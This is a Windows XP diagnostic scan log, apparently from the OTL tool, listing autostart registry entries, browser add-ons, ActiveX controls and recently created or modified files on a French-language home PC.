[2008/10/07 17:09:07 | 000,001,504 | ---- | M] () -- C:\Documents and Settings\Karim\Application Data\Mozilla\Firefox\Profiles\0s1th0pd.default\searchplugins\imdb.xml
[2006/11/23 16:13:59 | 000,002,459 | ---- | M] () -- C:\Documents and Settings\Karim\Application Data\Mozilla\Firefox\Profiles\0s1th0pd.default\searchplugins\msn.xml
[2011/03/18 14:53:46 | 000,001,835 | ---- | M] () -- C:\Documents and Settings\Karim\Application Data\Mozilla\Firefox\Profiles\0s1th0pd.default\searchplugins\weathercom.xml
[2011/04/12 12:06:56 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\Mozilla Firefox\extensions
[2011/04/12 12:06:56 | 000,000,000 | ---D | M] (Kaspersky URL Advisor) -- C:\Program Files\Mozilla Firefox\extensions\linkfilter@kaspersky.ru
File not found (No name found) -- C:\PROGRAM FILES\ALWIL SOFTWARE\AVAST5\WEBREP\FF
[2010/02/23 20:20:23 | 000,000,000 | ---D | M] (Java Quick Starter) -- C:\PROGRAM FILES\JAVA\JRE6\LIB\DEPLOY\JQS\FF
[2011/03/24 18:24:56 | 000,001,516 | ---- | M] () -- C:\Program Files\Mozilla Firefox\searchplugins\amazon-france.xml
[2011/03/24 18:24:56 | 000,001,822 | ---- | M] () -- C:\Program Files\Mozilla Firefox\searchplugins\cnrtl-tlfi-fr.xml
[2009/09/21 11:24:16 | 000,001,329 | ---- | M] () -- C:\Program Files\Mozilla Firefox\searchplugins\crawlersrch.xml
[2011/03/24 18:24:56 | 000,000,757 | ---- | M] () -- C:\Program Files\Mozilla Firefox\searchplugins\eBay-france.xml
[2011/03/24 18:24:56 | 000,001,426 | ---- | M] () -- C:\Program Files\Mozilla Firefox\searchplugins\wikipedia-fr.xml
[2011/03/24 18:24:56 | 000,000,956 | ---- | M] () -- C:\Program Files\Mozilla Firefox\searchplugins\yahoo-france.xml

O1 HOSTS File: ([2006/08/24 20:14:54 | 000,000,790 | ---- | M]) - C:\WINDOWS\system32\drivers\etc\hosts
O1 - Hosts: 127.0.0.1 localhost
O2 - BHO: (AcroIEHlprObj Class) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll (Adobe Systems Incorporated)
O2 - BHO: (IEVkbdBHO Class) - {59273AB4-E7D3-40F9-A1A8-6FA9CCA1862C} - C:\Program Files\Kaspersky Lab\Kaspersky PURE\ievkbd.dll (Kaspersky Lab)
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - No CLSID value found.
O2 - BHO: (Programme d'aide de l'Assistant de connexion Windows Live) - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Fichiers communs\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
O2 - BHO: (AcroIEToolbarHelper Class) - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll ()
O2 - BHO: (FilterBHO Class) - {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Program Files\Kaspersky Lab\Kaspersky PURE\klwtbbho.dll (Kaspersky Lab)
O3 - HKLM\..\Toolbar: (Adobe PDF) - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll ()
O3 - HKU\S-1-5-21-1220945662-746137067-839522115-1003\..\Toolbar\ShellBrowser: (no name) - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No CLSID value found.
O3 - HKU\S-1-5-21-1220945662-746137067-839522115-1003\..\Toolbar\ShellBrowser: (no name) - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - No CLSID value found.
O3 - HKU\S-1-5-21-1220945662-746137067-839522115-1003\..\Toolbar\ShellBrowser: (Adobe PDF) - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll ()
O3 - HKU\S-1-5-21-1220945662-746137067-839522115-1003\..\Toolbar\WebBrowser: (Adobe PDF) - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll ()
O4 - HKLM..\Run: [] File not found
O4 - HKLM..\Run: [avast5] File not found
O4 - HKLM..\Run: [AVP] C:\Program Files\Kaspersky Lab\Kaspersky PURE\avp.exe (Kaspersky Lab)
O4 - HKLM..\Run: [CheckUpdate] C:\WINDOWS\System32\fmaj5.exe ()
O4 - HKLM..\Run: [IMJPMIG8.1] C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE (Microsoft Corporation)
O4 - HKLM..\Run: [iTunesHelper] C:\Program Files\iTunes2\iTunesHelper.exe (Apple Inc.)
O4 - HKLM..\Run: [Logitech Utility] C:\WINDOWS\LOGI_MWX.EXE (Logitech Inc.)
O4 - HKLM..\Run: [LogitechVideoTray] C:\Program Files\Logitech\Video\LogiTray.exe (Logitech Inc.)
O4 - HKLM..\Run: [LVCOMSX] C:\WINDOWS\system32\LVCOMSX.EXE (Logitech Inc.)
O4 - HKLM..\Run: [MSPY2002] C:\WINDOWS\System32\IME\PINTLGNT\ImScInst.exe ()
O4 - HKLM..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe (Ahead Software Gmbh)
O4 - HKLM..\Run: [NWEReboot] File not found
O4 - HKLM..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE (Microsoft Corporation)
O4 - HKLM..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE (Microsoft Corporation)
O4 - HKLM..\Run: [SoundMan] C:\WINDOWS\SOUNDMAN.EXE (Realtek Semiconductor Corp.)
O4 - HKLM..\Run: [SunJavaUpdateSched] C:\Program Files\Fichiers communs\Java\Java Update\jusched.exe (Sun Microsystems, Inc.)
O4 - HKLM..\Run: [zBrowser Launcher] C:\Program Files\Logitech\iTouch\iTouch.exe (Logitech Inc.)
O4 - HKLM..\RunOnce: [Malwarebytes' Anti-Malware] C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe (Malwarebytes Corporation)
O4 - Startup: C:\Documents and Settings\All Users\Menu Démarrer\Programmes\Démarrage\Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe (Logitech, Inc.)
O4 - Startup: C:\Documents and Settings\Karim\Menu Démarrer\Programmes\Démarrage\ERUNT AutoBackup.lnk = C:\Program Files\ERUNT\AUTOBACK.EXE ()
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: HonorAutoRunSetting = 1
O7 - HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKU\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKU\S-1-5-21-1220945662-746137067-839522115-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O8 - Extra context menu item: Add to Google Photos Screensa&ver - C:\WINDOWS\System32\GPhotos.scr (Google Inc.)
O8 - Extra context menu item: Ajouter à l'Anti-bannière - C:\Program Files\Kaspersky Lab\Kaspersky PURE\ie_banner_deny.htm ()
O9 - Extra Button: Mon Clavier &virtuel - {4248FE82-7FCB-46AC-B270-339F08212110} - C:\Program Files\Kaspersky Lab\Kaspersky PURE\klwtbbho.dll (Kaspersky Lab)
O9 - Extra Button: PartyPoker.com - {B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} - File not found
O9 - Extra 'Tools' menuitem : PartyPoker.com - {B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} - File not found
O9 - Extra Button: Analyse des &liens - {CCF151D8-D089-449F-A5A4-D9909053F20F} - C:\Program Files\Kaspersky Lab\Kaspersky PURE\klwtbbho.dll (Kaspersky Lab)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000004 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O15 - HKU\S-1-5-21-1220945662-746137067-839522115-1003\..Trusted Domains: ([]msn in My Computer)
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} http://fpdownload.macromedia.com/get/sh ... tor/sw.cab (Shockwave ActiveX Control)
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} http://go.microsoft.com/fwlink/?linkid=39204 (Windows Genuine Advantage Validation Tool)
O16 - DPF: {4871A87A-BFDD-4106-8153-FFDE2BAC2967} http://dlm.tools.akamai.com/dlmanager/v ... .2.4.1.cab (DLM Control)
O16 - DPF: {5D637FAD-E202-48D1-8F18-5B9C459BD1E3} http://www.canalblog.com/sharedDocs/mis ... oader5.cab (Image Uploader Control)
O16 - DPF: {5D6F45B3-9043-443D-A792-115447494D24} http://messenger.zone.msn.com/FR-FR/a-U ... E_UNO1.cab (UnoCtrl Class)
O16 - DPF: {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} http://download.bitdefender.com/resourc ... oscan8.cab (BDSCANONLINE Control)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinsta ... s-i586.cab (Java Plug-in 1.6.0_18)
O16 - DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} http://fpdownload.macromedia.com/get/fl ... rashim.cab (Reg Error: Key error.)
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} http://messenger.zone.msn.com/binary/Me ... b56907.cab (MessengerStatsClient Class)
O16 - DPF: {CAFEEFAC-0014-0001-0002-ABCDEFFEDCBA} http://java.sun.com/update/1.4.1/jinsta ... s-i586.cab (Java Plug-in 1.4.1_02)
O16 - DPF: {CAFEEFAC-0016-0000-0018-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinsta ... s-i586.cab (Java Plug-in 1.6.0_18)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinsta ... s-i586.cab (Java Plug-in 1.6.0_18)
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://download.macromedia.com/pub/shoc ... wflash.cab (Shockwave Flash Object)
O16 - DPF: {D8089245-3211-40F6-819B-9E5E92CD61A2} https://mppv2flash3.valueactive.com/unibet/FlashAX.cab (FlashXControl Object)
O16 - DPF: {D96D2F74-0B74-47D2-964F-B67E9F69F1CD} http://asp.congnamul.com/AspActiveX/Con ... sp_V29.cab (CongnamulMap4Asp Control)
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab (Reg Error: Key error.)
O16 - DPF: {E77F23EB-E7AB-4502-8F37-247DBAF1A147} http://gfx2.hotmail.com/mail/w4/pr01/ph ... NPUpld.cab (Windows Live Hotmail Photo Upload Tool)
O16 - DPF: {FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9} https://secure.logmein.com/activex/ractrl.cab?lmi=100 (Performance Viewer Activex Control)
O16 - DPF: {FFBB3F3B-0A5A-4106-BE53-DFE1E2340CB1} http://dlm.tools.akamai.com/dlmanager/v ... .2.1.6.cab (Contrôleur de DownloadManager)
O16 - DPF: Microsoft XML Parser for Java file://C:\WINDOWS\Java\classes\xmldso.cab (Reg Error: Key error.)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.1
O18 - Protocol\Handler\http\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Fichiers communs\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\http\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Fichiers communs\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\https\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Fichiers communs\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\https\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Fichiers communs\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\ipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Fichiers communs\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Fichiers communs\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Fichiers communs\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\ms-itss {0A9007C0-4076-11D3-8789-0000F8105754} - C:\Program Files\Fichiers communs\Microsoft Shared\Information Retrieval\MSITSS.DLL (Microsoft Corporation)
O18 - Protocol\Handler\mso-offdap {3D9F03FA-7A94-11D3-BE81-0050048385D1} - C:\Program Files\Fichiers communs\Microsoft Shared\Web Components\10\OWC10.DLL (Microsoft Corporation)
O18 - Protocol\Handler\mso-offdap11 {32505114-5902-49B2-880A-1F7738E5A384} - C:\Program Files\Fichiers communs\Microsoft Shared\Web Components\11\OWC11.DLL (Microsoft Corporation)
O18 - Protocol\Filter\text/xml {807553E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Fichiers communs\Microsoft Shared\OFFICE11\MSOXMLMF.DLL (Microsoft Corporation)
O20 - AppInit_DLLs: (sockspy.dll sockspy.dll sockspy.dll sockspy.dll sockspy.dll sockspy.dll sockspy.dll sockspy.dll) - File not found
O20 - AppInit_DLLs: (C:\PROGRA~1\KASPER~1\KASPER~1\kloehk.dll) - C:\Program Files\Kaspersky Lab\Kaspersky PURE\kloehk.dll (Kaspersky Lab)
O20 - AppInit_DLLs: (C:\PROGRA~1\KASPER~1\KASPER~1\mzvkbd3.dll) - C:\Program Files\Kaspersky Lab\Kaspersky PURE\mzvkbd3.dll (Kaspersky Lab)
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20 - Winlogon\Notify\klogon: DllName - C:\WINDOWS\system32\klogon.dll - C:\WINDOWS\system32\klogon.dll (Kaspersky Lab)
O20 - Winlogon\Notify\LBTWlgn: DllName - c:\program files\fichiers communs\logishrd\bluetooth\LBTWlgn.dll - c:\Program Files\Fichiers communs\Logishrd\Bluetooth\LBTWLgn.dll (Logitech, Inc.)
O20 - Winlogon\Notify\WgaLogon: DllName - Reg Error: Value error. - Reg Error: Value error. File not found
O20 - Winlogon\Notify\WRNotifier: DllName - WRLogonNTF.dll - File not found
O24 - Desktop Components:0 (Ma page d'accueil) - About:Home
O24 - Desktop WallPaper: C:\Documents and Settings\Karim\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O24 - Desktop BackupWallPaper: C:\Documents and Settings\Karim\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2005/07/06 00:05:48 | 000,000,000 | ---- | M] () - C:\AUTOEXEC.BAT -- [ NTFS ]
O33 - MountPoints2\{392bca84-520f-11df-89d0-001167b8a506}\Shell - "" = AutoRun
O33 - MountPoints2\{392bca84-520f-11df-89d0-001167b8a506}\Shell\AutoRun\command - "" = "E:\WD SmartWare.exe" autoplay=true
O33 - MountPoints2\{392bca8b-520f-11df-89d0-001167b8a506}\Shell - "" = AutoRun
O33 - MountPoints2\{392bca8b-520f-11df-89d0-001167b8a506}\Shell\AutoRun\command - "" = "E:\WD SmartWare.exe" autoplay=true
O33 - MountPoints2\{7831a68a-f04a-11d9-bc84-94c83f134754}\Shell\Auto\command - "" = bittorrent.exe e
O33 - MountPoints2\{7831a68a-f04a-11d9-bc84-94c83f134754}\Shell\AutoRun\command - "" = C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL bittorrent.exe e
O33 - MountPoints2\{caa9985d-2c9b-11dc-8328-00301bb2e8e9}\Shell\AutoRun\command - "" = E:\InstallTomTomHOME.exe
O34 - HKLM BootExecute: (autocheck autochk *) - File not found
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*

NetSvcs: Ias - File not found
NetSvcs: Iprip - File not found
NetSvcs: NWCWorkstation - File not found
NetSvcs: Nwsapagent - File not found
NetSvcs: WmdmPmSp - File not found

========== Files/Folders - Created Within 30 Days ==========

[2011/05/11 13:18:21 | 000,000,000 | ---D | C] -- C:\WINDOWS\ERDNT
[2011/05/11 13:17:09 | 000,000,000 | ---D | C] -- C:\Program Files\ERUNT
[2011/05/11 13:17:09 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Menu Démarrer\Programmes\ERUNT
[2011/05/11 13:15:11 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Karim\Application Data\Malwarebytes
[2011/05/11 13:15:02 | 000,038,224 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbamswissarmy.sys
[2011/05/11 13:15:02 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Malwarebytes
[2011/05/11 13:14:58 | 000,020,952 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbam.sys
[2011/05/11 13:14:58 | 000,000,000 | ---D | C] -- C:\Program Files\Malwarebytes' Anti-Malware
[2011/05/11 13:13:20 | 000,791,393 | ---- | C] (Lars Hederer ) -- C:\Documents and Settings\Karim\Bureau\erunt-setup.exe
[2011/05/11 13:13:02 | 007,734,208 | ---- | C] (Malwarebytes Corporation ) -- C:\Documents and Settings\Karim\Bureau\mbam-setup-1.50.1.1100.exe
[2011/05/11 13:12:13 | 000,580,608 | ---- | C] (OldTimer Tools) -- C:\Documents and Settings\Karim\Bureau\OTL.exe
[2011/05/11 09:40:30 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Menu Démarrer\Programmes\WinSCP
[2011/05/11 09:40:29 | 000,000,000 | ---D | C] -- C:\Program Files\WinSCP
[2011/04/12 12:05:49 | 000,039,352 | ---- | C] (Infowatch) -- C:\WINDOWS\System32\drivers\CSVirtualDiskDrv.sys
[2011/04/12 12:05:48 | 000,088,632 | ---- | C] (Infowatch) -- C:\WINDOWS\System32\drivers\CSCrySec.sys
[2011/04/12 12:03:55 | 000,000,000 | ---D | C] -- C:\Program Files\Fichiers communs\InfoWatch
[2011/04/12 12:03:38 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Menu Démarrer\Programmes\Kaspersky PURE
[2011/04/12 12:03:38 | 000,000,000 | ---D | C] -- C:\Program Files\Kaspersky Lab
[2011/04/12 12:03:38 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Kaspersky Lab
[2011/04/12 12:02:49 | 000,315,408 | ---- | C] (Kaspersky Lab) -- C:\WINDOWS\System32\drivers\klif.sys
[2011/04/12 11:46:03 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Kaspersky Lab Setup Files
[2011/04/12 11:26:41 | 000,000,000 | ---D | C] -- C:\WINDOWS\BDOSCAN8
[6 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]
[11 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]

========== Files - Modified Within 30 Days ==========

[2011/05/11 13:17:21 | 000,000,767 | ---- | M] () -- C:\Documents and Settings\Karim\Menu Démarrer\Programmes\Démarrage\ERUNT AutoBackup.lnk
[2011/05/11 13:17:09 | 000,000,611 | ---- | M] () -- C:\Documents and Settings\Karim\Bureau\NTREGOPT.lnk
[2011/05/11 13:17:09 | 000,000,592 | ---- | M] () -- C:\Documents and Settings\Karim\Bureau\ERUNT.lnk
[2011/05/11 13:16:30 | 000,005,024 | ---- | M] () -- C:\Documents and Settings\Karim\Bureau\erunt-loc_fr.zip
[2011/05/11 13:15:02 | 000,000,784 | ---- | M] () -- C:\Documents and Settings\All Users\Bureau\Malwarebytes' Anti-Malware.lnk
[2011/05/11 13:13:20 | 000,791,393 | ---- | M] (Lars Hederer ) -- C:\Documents and Settings\Karim\Bureau\erunt-setup.exe
[2011/05/11 13:13:09 | 007,734,208 | ---- | M] (Malwarebytes Corporation ) -- C:\Documents and Settings\Karim\Bureau\mbam-setup-1.50.1.1100.exe
[2011/05/11 13:12:23 | 000,000,395 | ---- | M] () -- C:\Documents and Settings\Karim\Bureau\scan.zip
[2011/05/11 13:12:16 | 000,580,608 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Karim\Bureau\OTL.exe
[2011/05/11 13:10:29 | 000,000,026 | ---- | M] () -- C:\WINDOWS\System32\laststart
[2011/05/11 13:09:37 | 000,000,051 | ---- | M] () -- C:\WINDOWS\iTouch.ini
[2011/05/11 13:09:19 | 000,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2011/05/11 10:04:41 | 000,000,600 | ---- | M] () -- C:\Documents and Settings\Karim\Application Data\winscp.rnd
[2011/05/11 10:03:01 | 000,001,148 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-1220945662-746137067-839522115-1003UA.job
[2011/05/11 09:40:31 | 000,001,464 | ---- | M] () -- C:\Documents and Settings\Karim\Bureau\WinSCP.lnk
[2011/05/11 09:05:55 | 000,002,284 | ---- | M] () -- C:\Documents and Settings\Karim\Bureau\Google Chrome.lnk
[2011/05/11 09:03:06 | 000,001,096 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskUserS-1-5-21-1220945662-746137067-839522115-1003Core.job
[2011/05/11 08:37:12 | 000,002,206 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl
[2011/05/09 19:11:26 | 000,007,316 | ---- | M] () -- C:\Documents and Settings\Karim\intlname.ols
[2011/05/09 10:10:40 | 000,000,632 | ---- | M] () -- C:\HomeBankProxy.ini
[2011/05/06 16:00:20 | 000,262,518 | ---- | M] () -- C:\Documents and Settings\Karim\Mes documents\facture ACM acquittée.pdf
[2011/05/06 15:59:24 | 000,257,916 | ---- | M] () -- C:\Documents and Settings\Karim\Mes documents\facture ACM acquittée.jpg
[2011/04/29 15:57:45 | 001,046,581 | ---- | M] () -- C:\Documents and Settings\Karim\Mes documents\Nouvelle carte grise Laguna.pdf
[2011/04/29 15:54:43 | 000,479,699 | ---- | M] () -- C:\Documents and Settings\Karim\Mes documents\new carte grise laguna 001.jpg
[2011/04/29 15:53:53 | 000,558,165 | ---- | M] () -- C:\Documents and Settings\Karim\Mes documents\new carte grise laguna.jpg
[2011/04/26 10:33:14 | 000,000,792 | ---- | M] () -- C:\Documents and Settings\Karim\Application Data\Microsoft\Internet Explorer\Quick Launch\Démarrer Microsoft Office Outlook.lnk
[2011/04/26 10:33:11 | 000,513,094 | ---- | M] () -- C:\WINDOWS\System32\perfh00C.dat
[2011/04/26 10:33:11 | 000,444,054 | ---- | M] () -- C:\WINDOWS\System32\perfh009.dat
[2011/04/26 10:33:11 | 000,086,300 | ---- | M] () -- C:\WINDOWS\System32\perfc00C.dat
[2011/04/26 10:33:11 | 000,072,312 | ---- | M] () -- C:\WINDOWS\System32\perfc009.dat
[2011/04/26 10:23:58 | 001,701,776 | ---- | M] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[2011/04/18 10:24:57 | 000,001,374 | ---- | M] () -- C:\WINDOWS\imsins.BAK
[2011/04/18 10:06:01 | 000,437,688 | ---- | M] () -- C:\Documents and Settings\Karim\Mes documents\DAT De Wint Stéphanie.pdf
[2011/04/13 17:30:19 | 002,509,150 | ---- | M] () -- C:\Documents and Settings\Karim\Mes documents\compromis vente maison.pdf
[2011/04/13 17:26:57 | 000,324,615 | ---- | M] () -- C:\Documents and Settings\Karim\Mes documents\attestation tva acmobility.jpg
[2011/04/12 16:34:48 | 000,002,623 | ---- | M] () -- C:\Documents and Settings\Karim\Bureau\Microsoft Office Outlook 2003.lnk
[2011/04/12 15:27:08 | 000,002,341 | ---- | M] () -- C:\Documents and Settings\All Users\Bureau\iTunes.lnk
[2011/04/12 12:15:21 | 000,115,267 | ---- | M] () -- C:\WINDOWS\System32\drivers\klin.dat
[2011/04/12 12:15:21 | 000,097,859 | ---- | M] () -- C:\WINDOWS\System32\drivers\klick.dat
[2011/04/12 12:02:49 | 000,315,408 | ---- | M] (Kaspersky Lab) -- C:\WINDOWS\System32\drivers\klif.sys
[2011/04/12 11:53:52 | 000,003,072 | ---- | M] () -- C:\WINDOWS\System32\CONFIG.NT
[6 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]
[11 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]

========== Files Created - No Company Name ==========

[2011/05/11 13:17:21 | 000,000,767 | ---- | C] () -- C:\Documents and Settings\Karim\Menu Démarrer\Programmes\Démarrage\ERUNT AutoBackup.lnk
[2011/05/11 13:17:09 | 000,000,611 | ---- | C] () -- C:\Documents and Settings\Karim\Bureau\NTREGOPT.lnk
[2011/05/11 13:17:09 | 000,000,592 | ---- | C] () -- C:\Documents and Settings\Karim\Bureau\ERUNT.lnk
[2011/05/11 13:16:30 | 000,005,024 | ---- | C] () -- C:\Documents and Settings\Karim\Bureau\erunt-loc_fr.zip
[2011/05/11 13:15:02 | 000,000,784 | ---- | C] () -- C:\Documents and Settings\All Users\Bureau\Malwarebytes' Anti-Malware.lnk
[2011/05/11 13:12:23 | 000,000,395 | ---- | C] () -- C:\Documents and Settings\Karim\Bureau\scan.zip
[2011/05/11 09:40:31 | 000,001,464 | ---- | C] () -- C:\Documents and Settings\Karim\Bureau\WinSCP.lnk
[2011/05/06 16:00:19 | 000,262,518 | ---- | C] () -- C:\Documents and Settings\Karim\Mes documents\facture ACM acquittée.pdf
[2011/05/06 15:58:17 | 000,257,916 | ---- | C] () -- C:\Documents and Settings\Karim\Mes documents\facture ACM acquittée.jpg
[2011/04/29 15:57:43 | 001,046,581 | ---- | C] () -- C:\Documents and Settings\Karim\Mes documents\Nouvelle carte grise Laguna.pdf
[2011/04/29 15:54:24 | 000,479,699 | ---- | C] () -- C:\Documents and Settings\Karim\Mes documents\new carte grise laguna 001.jpg
[2011/04/29 15:52:46 | 000,558,165 | ---- | C] () -- C:\Documents and Settings\Karim\Mes documents\new carte grise laguna.jpg
[2011/04/18 10:06:01 | 000,437,688 | ---- | C] () -- C:\Documents and Settings\Karim\Mes documents\DAT De Wint Stéphanie.pdf
[2011/04/13 17:30:18 | 002,509,150 | ---- | C] () -- C:\Documents and Settings\Karim\Mes documents\compromis vente maison.pdf
[2011/04/13 17:26:20 | 000,324,615 | ---- | C] () -- C:\Documents and Settings\Karim\Mes documents\attestation tva acmobility.jpg
[2011/04/12 16:34:46 | 000,002,623 | ---- | C] () -- C:\Documents and Settings\Karim\Bureau\Microsoft Office Outlook 2003.lnk
[2011/04/12 12:06:43 | 000,115,267 | ---- | C] () -- C:\WINDOWS\System32\drivers\klin.dat
[2011/04/12 12:06:43 | 000,097,859 | ---- | C] () -- C:\WINDOWS\System32\drivers\klick.dat
[2011/03/24 19:05:16 | 000,254,576 | ---- | C] () -- C:\Documents and Settings\LocalService\Local Settings\Application Data\FontCache3.0.0.0.dat
[2011/02/14 16:49:13 | 000,000,600 | ---- | C] () -- C:\Documents and Settings\Karim\Application Data\winscp.rnd
[2011/02/02 18:53:50 | 000,000,022 | ---- | C] () -- C:\WINDOWS\System32\winStudio.bin
[2010/08/16 20:19:21 | 000,000,050 | ---- | C] () -- C:\WINDOWS\MegaManager.INI
[2010/04/04 10:21:01 | 000,000,012 | ---- | C] () -- C:\Documents and Settings\LocalService\Application Data\jasltw.dat
[2010/04/02 18:28:58 | 000,000,012 | ---- | C] () -- C:\Documents and Settings\NetworkService\Application Data\jasltw.dat
[2010/04/02 18:28:52 | 000,000,004 | ---- | C] () -- C:\Documents and Settings\Karim\Application Data\avdrn.dat
[2010/03/24 16:08:29 | 000,165,376 | ---- | C] () -- C:\WINDOWS\System32\unrar.dll
[2010/02/01 17:16:32 | 000,000,754 | ---- | C] () -- C:\WINDOWS\WORDPAD.INI
[2010/01/25 12:58:06 | 000,462,848 | ---- | C] () -- C:\WINDOWS\System32\ractrlkeyhook.dll
[2009/11/22 18:25:35 | 000,392,192 | ---- | C] () -- C:\WINDOWS\System32\fmaj5.exe
[2009/10/28 14:29:40 | 000,000,940 | ---- | C] () -- C:\WINDOWS\bdoscandellang.ini
[2009/09/17 18:39:31 | 000,719,313 | ---- | C] () -- C:\WINDOWS\System32\unins000.exe
[2009/09/17 18:39:31 | 000,032,339 | ---- | C] () -- C:\WINDOWS\System32\unins000.dat
[2009/09/09 19:01:40 | 000,027,675 | ---- | C] () -- C:\WINDOWS\System32\drivers\klopp.dat
[2009/04/15 21:36:53 | 000,038,446 | ---- | C] () -- C:\Documents and Settings\Karim\Application Data\Microsoft Excel.ADR
[2009/03/16 18:28:57 | 000,066,048 | ---- | C] () -- C:\WINDOWS\System32\cygz.dll
